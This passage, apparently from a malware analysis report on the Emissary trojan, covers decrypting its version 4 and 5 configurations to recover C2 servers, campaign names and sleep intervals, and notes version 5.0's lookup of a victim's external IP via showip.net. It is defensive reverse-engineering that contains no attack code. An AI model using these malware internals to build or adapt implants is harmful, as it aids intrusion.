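Against a real sample, `extract_v5_config(open("75BD50EC.DAT", "rb").read())` and `decrypt_v4_config(open("Remdisk.dll", "rb").read())` give the raw plaintext; where the decrypted bytes line up with `emissary_new_config`, `parse_new_config` pulls out the version, GUID, three C2 servers, campaign name and sleep interval. A quick sanity check on the keystream is that `srand(1)` followed by `rand()` must produce 41 in MSVCRT; if your reimplementation does not, the decrypted configuration will be noise.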
Version 5.0 uses numbers within its command handler and the same configuration structure as the out-of-order version 3.0. The only major change in 5.0 is the ability to obtain a compromised system's external IP address by performing an HTTP GET request to "http://showip.net/index.php". The code parses the response from this webserver for the following to obtain the system's IP address: